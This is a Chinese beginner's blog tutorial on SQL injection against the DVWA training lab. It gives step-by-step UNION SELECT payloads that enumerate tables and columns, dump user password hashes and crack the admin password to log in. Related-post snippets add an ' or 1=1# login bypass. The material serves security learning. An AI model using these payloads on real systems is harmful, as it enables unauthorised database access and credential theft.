sql注入之入门基础

最新推荐文章于 2024-07-08 19:28:21 发布
最新推荐文章于 2024-07-08 19:28:21 发布
阅读量291 收藏
点赞数 3
分类专栏: 笔记 入门 文章标签: mysql sql python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YP_IT/article/details/107790960
版权

一、首先判断是否存在sql数字注入或者sql字符注入

注:这里需要用到dvwa来做实验

  1. 在输入框或者url输入 ' (英文状态下的单引号) 如果页面报错说明存在字符注入。
  2. 、在输入框或者 url输入and 1=1 #页面正常输入and 1=2 # 页面报错说明存在数字注入

二、利用order by 语句查看该表存在几个字段

0' order by n #

n为字段数,当n=当前字段数,此时页面无变化,当n=当前字段+1时,页面报错说明这里的字段数为n.

三、查看当前字段位置

0union select 1,2 #

在这里插入图片描述

四、利用database()函数和user()函数查询当前使用的数据库和用户

0' union select database(),user() #

在这里插入图片描述

五、利用sql注入查表名

0' union select 1,group_concat(table_name) 
from information_schema.tables where table_schema='dvwa' #

在这里插入图片描述

六、利用sql注入查users表的字段

0' union select 1,group_concat(column_name) from
information_schema.columns where table_schema='dvwa' 
and table_name='users' #

在这里插入图片描述

七、利用sql注入查字段user/password

0'union select user,password from users  #

在这里插入图片描述

八、利用MD5算法算出用户admin的密码

在这里插入图片描述

九、利用得到的用户名admin和密码password就可以登录了

填坑少年
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入sql-labs通关1-18(手工注入、高权限注入、文件读写、提交方式、查询方式、WAF绕过、sqlmap)
m0_61506558的博客
07-25 831
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。......
渗透学习入门SQL注入
07-31
渗透学习入门SQL注入 SQL 注入是一种常见的Web 应用程序漏洞,攻击者通过构造恶意输入来访问或控制数据库中的数据。SQL 注入攻击通常发生在Web 应用程序使用用户输入来构建动态SQL 语句时,攻击者可以 inject ...
SQL注入基础入门注入思路及常见的SQL注入类型总结
好好睡觉
03-04 6597
SQL注入基础部分、注入脚本、常见注入类型分类、报错注入、联合查询思路
sql手工注入原理
春日野穹
09-13 3571
判断是否存在注入 纯粹一些个人练习心得,所以今天就写一篇博客记录一下 数值型 1.URL输入 and 1=1 / and 1=2 回显页面不同(整形判断) 如果页面运行错误,则说明此 Sql 注入为数字型注入。 因为当我们输入 and 1=1时,后台执行 Sql 语句: 如:select * from <表名> where id = x and 1=1 没有语法错误且逻辑判断为正确,所...
SQL注入入门(一)——SQL注入初认识
Pz_mstr's Blog
08-13 1181
揭开SQL注入的神秘面纱
sql注入入门
lelemom的博客
11-21 671
参考文章:https://www.cnblogs.com/sdya/p/4568548.html 正常的语句 select * from users where username='marcofly' and password=md5('test') 异常操作: 在用户名输入框中输入:’ or 1=1#,密码随便输入,这时候的合成后的SQL查询语句为:   select * from u...
SQL注入入门
qq_46151129的博客
10-04 94
SQL基础 SQL注入:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。 原理 通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作。 产生原因 1.不当的类型处理; 2.不安全的数据库配置; 3.不合理的查询集处理; 4.不当的错误处理; 5.转义
SQL注入——入门
热门推荐
个人笔记
07-09 4万+
SQL注入 快捷键 加粗 Ctrl + B 斜体 Ctrl + I 引用 Ctrl + Q 插入链接 Ctrl + L 插入代码 Ctrl + K 插入图片 Ctrl + G 提升标题 Ctrl + H 有序列表 Ctrl + O 无序列表 Ctrl + U 横线 Ctrl + R 撤销 Ctrl + Z 重做 ...
sql注入之新手入门示例详解
09-10
本文将从基础层面介绍SQL注入的原理、检测方法以及初步的防范措施。 首先,我们需要理解SQL注入的基本概念。当用户输入的数据(如URL参数`id`)被直接拼接到SQL查询中,如`SELECT username, password FROM table ...
SQL注入攻防入门详解
11-12
SQL注入基础在于,攻击者通过输入包含SQL语句的字符串,使得应用程序在与数据库交互时执行了非预期的操作。例如,一个简单的登录表单可能接收用户名和密码,然后构建SQL查询。如果验证不充分,攻击者可以插入额外...
sql注入学习入门
12-16
sql注入学习入门
SQL注入实战
11-20
安全大神冰河亲自制作SQL注入入门级案例,非常适合初学者研究实践SQL注入,更好的提升自身对SQL 漏洞的注入能力和对数据库安全的认识。
web安全性测试之sql注入入门
03-30
SQL 注入入门SQL 注入是指攻击者通过构造特殊的 SQL 语句, Inject 到服务器的数据库中,来获取或修改敏感数据的攻击行为。SQL 注入的原理是从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取你想...
sql注入--入门
小虾米
03-20 917
首先,需要先学习一下SQL语句,至少知道怎么用。具体可以参考w3school。其次,需要了解各种各种数据库的结构。例如mysql数据库,有information_schema库,库里有schemata,tables,columns表,表里还有各种字段。这里推荐一下适合SQL注入入门的资源: sqli-labs环境搭建: https://github.com/Audi-1/sqli-labs MyS
Sql注入入门教程
New_Ss_的博客
01-29 1529
Sql注入比较常见的漏洞之一,例用程序员的漏洞来进行无账号的登陆,篡改数据库。任何客户端可控,传参数到服务端的变量,和数据库交互,都有可能存在sql注入 原理 用户通过构造sql语句来模仿服务器发向服务器的语句,造成错误执行。从而达到自己的目的。 sql注入的步骤 1.发现注入位置。 2.判断注入类型传参方式的:get类型,post类型,cookie类型。 以及根据注入点不同的:数字型注入,单引号注入,双引号注入。 首先是单引号双引号注入(单引号为例): SELECT * FROM.
SQL注入基础入门
wyp20011020的博客
03-29 215
sql注入
sql注入入门学习
weixin_53146913的博客
07-20 451
MySQl注入的一般流程
MySQL Buffer Pool
最新发布
Mazai-Liu的博客
07-08 1095
LRU链表分为冷、热数据区域,前63%为热数据区域,后37%为冷数据区域,加载缓存页先放到冷数据区域头部。冷数据区域的缓存页第一次访问超过1秒后,再次访问时才会被移动到热数据区域头部。热数据区域中,只有后3/4的缓存页被访问才会移到头部,前1/4被访问到不会移动。淘汰数据优先淘汰冷数据区域尾部的缓存页。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值